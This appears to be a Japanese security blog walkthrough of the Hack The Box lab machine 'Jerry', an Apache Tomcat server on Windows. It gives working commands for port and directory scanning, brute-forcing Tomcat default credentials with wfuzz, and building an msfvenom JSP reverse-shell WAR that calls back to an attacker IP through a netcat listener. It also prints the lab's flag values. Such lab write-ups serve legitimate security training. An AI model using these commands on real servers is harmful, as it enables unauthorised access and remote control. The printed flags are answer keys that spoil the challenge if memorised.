セキュリティ技術メモブログ

日々の活動を記録する場所

【Hack The Box】Jerry Walkthrough

はじめに

  • マシン名:Jerry
  • OS:Windows
  • 目標:user.txtとroot.txtの中身の取得
  • ターゲットIPアドレス:10.10.10.95

ポートスキャン

# nmap -A 10.10.10.95

f:id:Paichan:20200704225017p:plain 8080(http)が開いてる。

ブラウザで8080番ポートへアクセス

ブラウザで8080番ポートへアクセスすると、tomcatの管理画面。 f:id:Paichan:20200704225054p:plain

ディレクトリスキャン

いつもはgobusterを使うが、色々なツールを使いこなすためにwfuzzを使ってでディレクトリスキャンを実行してみる。

# wfuzz -z file,/usr/share/dirb/wordlists/common.txt -c --hc 404 -t 100 http://10.10.10.95:8080/FUZZ

f:id:Paichan:20200704225400p:plain 気になるものはなし。

管理画面への認証試行

ディレクトリスキャンで次につながるものを見つけられなかったので、tomcat管理画面への認証試行を行う。
tomcat default credentioal」とかで調べて見つけた以下のサイトでユーザーリスト、パスワードリストを作成し、wfuzzで認証試行。
Default-Credentials/Apache-Tomcat-Default-Passwords.mdown at master · netbiosX/Default-Credentials · GitHub

# wfuzz -z list,admin-manager-role1-root-tomcat -z list,password-Password1-password1-admin-tomcat-manager-role1-changethis-r00t-s3cret --basic FUZZ:FUZ2Z -c --hc 401 http://10.10.10.95:8080/manager/html

f:id:Paichan:20200704225906p:plain tomcat - s3cretという組み合わせでログイン成功。

リバースシェルのアップロード

ログインすると、以下のような画面。warファイルをアップロードができそうなので、ここにmsfvenomでwarのリバースシェルをアップロードする。 f:id:Paichan:20200704230045p:plain

リバーシェル獲得のためのwarファイルの生成は、msfvenomのチートシートを参考にした。
MSFVenom Cheatsheet « Red Team Tutorials

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.23 LPORT=1111 -f war > shell.war

f:id:Paichan:20200704230346p:plain

アップロード成功。 f:id:Paichan:20200704230515p:plain

シェルの獲得

ncを使って1111ポートで待ち受ける。

# nc -lvp 1111

ブラウザで、アップロードしたパスへアクセスすると、シェルが返ってきた。しかもシステム権限で。 f:id:Paichan:20200704230651p:plain

あとは、user.txtとroot.txtを確認して終了。

user.txt:7004dbcef0f854e0fb401875f26ebd00
root.txt:04a8b36e1545a455393d067e772fe90e

追記

認証失敗時のエラー画面に、tomcat - s3cretと書かれてました。ちゃんと確認すればwfuzzで認証試行する必要なかったようだ。 f:id:Paichan:20200704231004p:plain